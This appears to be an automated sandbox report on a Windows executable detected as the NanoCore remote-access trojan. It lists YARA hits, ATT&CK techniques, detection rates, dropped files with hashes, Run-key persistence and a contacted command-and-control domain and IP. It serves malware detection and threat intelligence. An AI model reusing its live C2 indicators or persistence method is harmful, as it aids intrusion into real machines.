      Source: C:\Users\user\Desktop\SviRsoKz6E.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00401B74
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
      Source: C:\Users\user\Desktop\SviRsoKz6E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORY
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: SviRsoKz6E.exe, 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: SviRsoKz6E.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: SviRsoKz6E.exe, 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000002.00000001.198223506.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465661471.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.201495847.00000000033A0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.465992786.0000000004F72000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.461711945.0000000002461000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.466862235.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.460275613.000000000064A000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.463943126.00000000034F3000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 2212, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: SviRsoKz6E.exe PID: 632, type: MEMORY
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4f70000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34ffad1.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.34fb4a8.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.SviRsoKz6E.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33a0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b0000.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.SviRsoKz6E.exe.33b1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.4940000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.56b4629.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.SviRsoKz6E.exe.664350.2.raw.unpack, type: UNPACKEDPE

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder1Access Token Manipulation1Disable or Modify Tools1Input Capture11System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information1Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing31NTDSSecurity Software Discovery131Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion31Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      SviRsoKz6E.exe39%VirustotalBrowse
      SviRsoKz6E.exe14%MetadefenderBrowse
      SviRsoKz6E.exe72%ReversingLabsWin32.Trojan.Predator
      SviRsoKz6E.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll21%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll48%ReversingLabsWin32.Trojan.Predator
      C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exe39%VirustotalBrowse
      C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exe14%MetadefenderBrowse
      C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz\Adobe.exe72%ReversingLabsWin32.Trojan.Predator

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.SviRsoKz6E.exe.400000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.0.SviRsoKz6E.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
      2.2.SviRsoKz6E.exe.4f70000.7.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      2.1.SviRsoKz6E.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      0.0.SviRsoKz6E.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
      2.2.SviRsoKz6E.exe.56b0000.11.unpack100%AviraTR/NanoCore.fadteDownload File
      0.2.SviRsoKz6E.exe.30f0000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
      0.2.SviRsoKz6E.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

      Domains

      SourceDetectionScannerLabelLink
      justinalwhitedd554.duckdns.org2%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      justinalwhitedd554.duckdns.org2%VirustotalBrowse
      justinalwhitedd554.duckdns.org0%Avira URL Cloudsafe
      paymentmaba.sinsincity.com0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      justinalwhitedd554.duckdns.org
      		104.37.1.32
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      justinalwhitedd554.duckdns.orgtrue
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      paymentmaba.sinsincity.comtrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorSviRsoKz6E.exefalse
        		high
        http://nsis.sf.net/NSIS_ErrorErrorSviRsoKz6E.exefalse
          		high

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          104.37.1.32
          		justinalwhitedd554.duckdns.orgUnited States
          		36351SOFTLAYERUStrue

          General Information

          Joe Sandbox Version:31.0.0 Emerald
          Analysis ID:381760
          Start date:04.04.2021
          Start time:23:27:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 6m 47s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:SviRsoKz6E.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:25
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@3/6@18/1
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 8.2% (good quality ratio 7.6%)
          • Quality average: 78.9%
          • Quality standard deviation: 30.2%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 92
          • Number of non-executed functions: 44
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 20.50.102.62, 184.30.20.56, 168.61.161.212, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 20.82.209.183
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
          • Report size getting too big, too many NtDeviceIoControlFile calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          23:27:44API Interceptor1029x Sleep call for process: SviRsoKz6E.exe modified
          23:27:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run justinalwhitedd554.duckdns.org.exe C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrst
          23:27:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run justinalwhitedd554.duckdns.org.exe C:\Users\user\AppData\Roaming\abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrst

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          104.37.1.32KyVkwYhS69.exeGet hashmaliciousBrowse
            fL14L0yc4M.exeGet hashmaliciousBrowse
              ws6g7ojmL0.exeGet hashmaliciousBrowse

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                justinalwhitedd554.duckdns.orgws6g7ojmL0.exeGet hashmaliciousBrowse
                • 104.37.1.32

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                SOFTLAYERUSVdSaL6WCqP.dllGet hashmaliciousBrowse
                • 159.8.59.84
                VdSaL6WCqP.dllGet hashmaliciousBrowse
                • 159.8.59.84
                MuILXZPOKY.dllGet hashmaliciousBrowse
                • 159.8.59.84
                MuILXZPOKY.dllGet hashmaliciousBrowse
                • 159.8.59.84
                csxKgL6Nvi.dllGet hashmaliciousBrowse
                • 159.8.59.84
                csxKgL6Nvi.dllGet hashmaliciousBrowse
                • 159.8.59.84
                ux2cMVoVuT.dllGet hashmaliciousBrowse
                • 159.8.59.84
                ux2cMVoVuT.dllGet hashmaliciousBrowse
                • 159.8.59.84
                mPOtxOC1SV.dllGet hashmaliciousBrowse
                • 159.8.59.84
                y3787j9cJX.dllGet hashmaliciousBrowse
                • 159.8.59.84
                JRtcUI8csG.dllGet hashmaliciousBrowse
                • 159.8.59.84
                uHFobmfQhB.dllGet hashmaliciousBrowse
                • 159.8.59.84
                KilfLPpnGY.dllGet hashmaliciousBrowse
                • 159.8.59.84
                XMybpE2zdJ.dllGet hashmaliciousBrowse
                • 159.8.59.84
                4EZuDvo8vn.dllGet hashmaliciousBrowse
                • 159.8.59.84
                t51PMqFkL8.dllGet hashmaliciousBrowse
                • 159.8.59.84
                aC6KD7nRI6.dllGet hashmaliciousBrowse
                • 159.8.59.84
                aC6KD7nRI6.dllGet hashmaliciousBrowse
                • 159.8.59.84
                pSfdhDwTbN.dllGet hashmaliciousBrowse
                • 159.8.59.84
                pSfdhDwTbN.dllGet hashmaliciousBrowse
                • 159.8.59.84

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\1bt90noxyykcnf0zwhq
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:data
                Category:dropped
                Size (bytes):282624
                Entropy (8bit):7.999356410033186
                Encrypted:true
                SSDEEP:6144:8WGNpoisfWzTj4+DP0hotN17VlKWhS6Mg1KWozL4aR:8fpguzTj4ThotdlKOMxWozk+
                MD5:D375D7F7DDB26EFA10A4A32A7C48E196
                SHA1:048496CB59D91E55C140CBCE4347B9C0E86A08DA
                SHA-256:386B97655841D8A34270A374B51B309976D0F607D978611BC9B601AF16AA30DC
                SHA-512:8FE2FCBC1E414EDCAD293CD6AC207F6249595EBD6DE4768EE70641C1DE138C84FA4FCAE71F3933E272B2587D8849CAFE6C1E75E01F1797BA6B6B01DF8264EB08
                Malicious:false
                Reputation:low
                Preview: E....1p.%].?.6.0.v[.}..................M..+..gX.si..-=...Z..rS.2..i...M......osr.E....[.........s..!..6.......m.....[+{........Y..M..|Q.g.}......xy..?.4.q.....z...~...\..t.....q.......Ztig.9...l(d..Z.qo......;.C.o.@.d......*N..K*.i*y..`o..: ..Z....'.......x...5..i...c.c.9.[..nm.M.W...M.....'.e.j.. [.ko<.\G............q.P..^.K../......^...f....x=...b...q...(..{.s..zb...m.s\S..Z.o`.w..@..\&.`.rv<...#G{r...L..H.....i.vt.l~.......%cf.....4.4..K.$}.........|*..R..K..q.....K..<.x...(..g.....k....+.~v..w..B..r...c.1DoX.:...nE.b...|.nC..7...2bKi.=..o...X.6.r_wu.:p..j0..y.-..._..&..;.W..u+...p1..1....... .4.1.....1.2..O.J.c.z_v.4...S..(%q..q.A.gaL.T5.T....q3s.@:vvfo~.JP.. .1.dW.:`.29........J{.~.Q.N..z.].....UV..>...v...5Q..s.w...E.0..S...r[..<..%.......k......8.....@...<..y..~.B,......(k,...8.c.....z.u..x.._...5.f3..8V..j+._p..O.f....).$s._.I..........[(!.N'....8N.U....=q{..Q....y....a6.V.....r..+.m...$..hM_..t*I...1a..M..h.....y...l=u..j4D.U
                C:\Users\user\AppData\Local\Temp\3wj5sgysu7cdpeh8
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:data
                Category:dropped
                Size (bytes):10245
                Entropy (8bit):7.970803367763071
                Encrypted:false
                SSDEEP:192:ooCRm5NgSp46ju699IPb2A2ru4qS/wFEIjy+9aP:cm5RU69AyAoHqS/wZy+oP
                MD5:9D1595AB0D85594C14E7CB15A55E3F9E
                SHA1:A098A190102DB36C146E65EFDC08C34113C5C41E
                SHA-256:9FC982652F0A6B5B98D0ED481D9231D3FDECEBC34E98EB6493A849DE9B6B5189
                SHA-512:BD75157A2E8A6DAEADD2ECF690D7A3146BFA41FC1CA673A6675BC7AFF3881DE00E09786D7CE80C291A75CDA36B810EE8B179D364E7C2717B76228DE8C8277F98
                Malicious:false
                Reputation:low
                Preview: ..KC~Q.3.../.;.F...........%Ut....M.)u.}"...1c>.`..[jmh.F...^....K..`".4/.0.p.....T.Z^{5....9.L.^v.;.l-:H....c..$.p3....K@....g.d...E.....R...n..s9.r.X.........C@l<..O.-...e....V.).!.J .......F..i+..wy4E..)13.......M.Q.IC.}C.B.qB..v...T.Z.W..O.>...J.`.2.m.g.\f..T....{...7..p...g5 .U.U.f$VF.....R....o).}6.?.....(a_.g.<..'......e.JF..6.W....j....:....I.$..w....L....._....u.Sz@.lg!....&.W.J.....z4.p/.y.0.,c].....MO.......6Q...i.T.".....R..a....>.2?.k....E.%\..z...G.J.d.=..l6..l.....wu.W.f7....>t2s6w....j$*C.................Nv...d....~z.Y.h.....;v..?y...@.a.e..Z...U.s..H...l.E.............F.\....L.q..eA...Q.7..#e.|.bl.._o......b#r..zSv.3Nq.$Cl.....V... ..E..x+cP...V.'...9.Z..PH......l..Vm7...W.zO.5~.....6.Javx...B.0.yCFWr...!..M..=E...3...D..3.'`a.y6TV.._....b\..z..&.../j..+....wG..j&....?...1r..k<.\^~.9.s..H.....:...p.jk...\..[....sk.....>.au.S.n(.U..Y.O...j........z4..)z.(W&x.]...&.r....E..../..O.h..U...}F.+N....&....
                C:\Users\user\AppData\Local\Temp\nst2F82.tmp\tkmg9lz0c84fk1.dll
                Process:C:\Users\user\Desktop\SviRsoKz6E.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.224397794265047
                Encrypted:false
                SSDEEP:48:SesgkKfGtShb1aU26crZ26TZZY4ITjG+mAoakbZ7IGRuqS:ME1aPZZxILmxZxFx
                MD5:397C7EA3337C5E01F39D2572A0C5B6E9
                SHA1:3921DDD729F3F69932A12915696EEBEAAEA1238B
                SHA-256:0E36B538B99E7B2AA0E23DD9B2720F56129A8F2FB50A203BB68CF7CCB544E60D
                SHA-512:48BB084F549C65CACD83F4A72A513511509283972FD04BDC92A64862AA782828E4D1FF315AE7C9774C607EE9B8815CCD740B9418659F469F81D99628DFB48D46
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 21%, Browse
                • Antivirus: ReversingLabs, Detection: 48%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................PE..L....$e`...........!......................... ...............................P.......................................$..M.... .......@............................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...(....0......................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................................
